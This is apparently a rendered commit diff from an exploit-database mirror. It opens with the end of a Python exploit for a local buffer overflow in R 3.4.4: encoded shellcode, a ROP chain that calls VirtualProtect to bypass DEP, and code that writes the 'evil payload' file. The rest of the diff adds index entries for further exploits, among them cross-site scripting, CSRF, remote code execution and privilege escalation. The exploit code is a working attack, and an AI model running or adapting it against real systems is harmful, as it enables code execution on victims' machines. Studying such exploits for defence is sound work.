shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
|
||||||
|
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
|
||||||
|
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
|
||||||
|
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
|
||||||
|
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
|
||||||
|
|
||||||
|
'''
|
||||||
|
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
|
||||||
|
--------------------------------------------
|
||||||
|
Register setup for VirtualProtect() :
|
||||||
|
--------------------------------------------
|
||||||
|
EAX = NOP (0x90909090)
|
||||||
|
ECX = lpOldProtect (ptr to W address)
|
||||||
|
EDX = NewProtect (0x40)
|
||||||
|
EBX = dwSize
|
||||||
|
ESP = lPAddress (automatic)
|
||||||
|
EBP = ReturnTo (ptr to jmp esp)
|
||||||
|
ESI = ptr to VirtualProtect()
|
||||||
|
EDI = ROP NOP (RETN)
|
||||||
|
--------------------------------------------
|
||||||
|
'''
|
||||||
|
|
||||||
|
rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]
|
||||||
|
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
|
||||||
|
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]
|
||||||
|
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
|
||||||
|
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]
|
||||||
|
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040
|
||||||
|
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]
|
||||||
|
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]
|
||||||
|
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
|
||||||
|
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]
|
||||||
|
rop += struct.pack('<L', 0x90909090) # nop
|
||||||
|
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]
|
||||||
|
|
||||||
|
buffer = '\x41' * 292 # filler to EIP
|
||||||
|
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]
|
||||||
|
buffer += '\x41' * 4 # compensate for pop esi
|
||||||
|
buffer += rop
|
||||||
|
buffer += '\x90' * 50
|
||||||
|
buffer += shellcode
|
||||||
|
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
|
||||||
|
|
||||||
|
try:
|
||||||
|
f=open('payload.txt','w')
|
||||||
|
print '[+] Creating %s bytes evil payload..' %len(buffer)
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print '[+] File created!'
|
||||||
|
except Exception as e:
|
||||||
|
print e
|
|
@ -9722,6 +9722,8 @@ id,file,description,date,author,type,platform,port
|
||||||
44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
|
44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
|
||||||
44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux,
|
44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux,
|
||||||
44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
|
44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
|
||||||
|
44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
|
||||||
|
44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -39248,7 +39250,7 @@ id,file,description,date,author,type,platform,port
|
||||||
44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
|
44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
|
||||||
44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
|
44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
|
||||||
44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
|
44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
|
||||||
44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux,
|
44430,exploits/xml/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,xml,
|
||||||
44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux,
|
44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux,
|
||||||
44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
|
44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
|
||||||
44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
|
44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
|
||||||
|
@ -39344,5 +39346,20 @@ id,file,description,date,author,type,platform,port
|
||||||
44650,exploits/hardware/webapps/44650.txt,"Cisco SA520W Security Appliance - Path Traversal",2018-05-18,"Nassim Asrir",webapps,hardware,
|
44650,exploits/hardware/webapps/44650.txt,"Cisco SA520W Security Appliance - Path Traversal",2018-05-18,"Nassim Asrir",webapps,hardware,
|
||||||
44655,exploits/linux/webapps/44655.txt,"SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion",2018-05-18,"Richard Alviarez",webapps,linux,
|
44655,exploits/linux/webapps/44655.txt,"SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion",2018-05-18,"Richard Alviarez",webapps,linux,
|
||||||
44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware,
|
44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware,
|
||||||
44659,exploits/jsp/webapps/44659.py,"Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution",2018-05-20,StaticFlow,webapps,jsp,
|
44661,exploits/php/webapps/44661.txt,"Superfood 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
|
||||||
44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php,
|
44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php,
|
||||||
|
44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
|
||||||
|
44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
|
||||||
|
44664,exploits/php/webapps/44664.txt,"Zenar Content Management System - Cross-Site Scripting",2018-05-21,"Berk Dusunur",webapps,php,
|
||||||
|
44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,
|
||||||
|
44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
|
||||||
|
44667,exploits/linux/webapps/44667.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,linux,
|
||||||
|
44671,exploits/hardware/webapps/44671.html,"Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
|
||||||
|
44672,exploits/hardware/webapps/44672.txt,"Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
|
||||||
|
44675,exploits/hardware/webapps/44675.html,"Teradek Cube 7.3.6 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
|
||||||
|
44676,exploits/hardware/webapps/44676.html,"Teradek Slice 7.3.15 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
|
||||||
|
44678,exploits/windows/webapps/44678.txt,"Schneider Electric PLCs - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,windows,
|
||||||
|
44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass",2018-05-21,L0RD,webapps,php,
|
||||||
|
44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,
|
||||||
|
44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass",2018-05-21,L0RD,webapps,php,
|
||||||
|
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue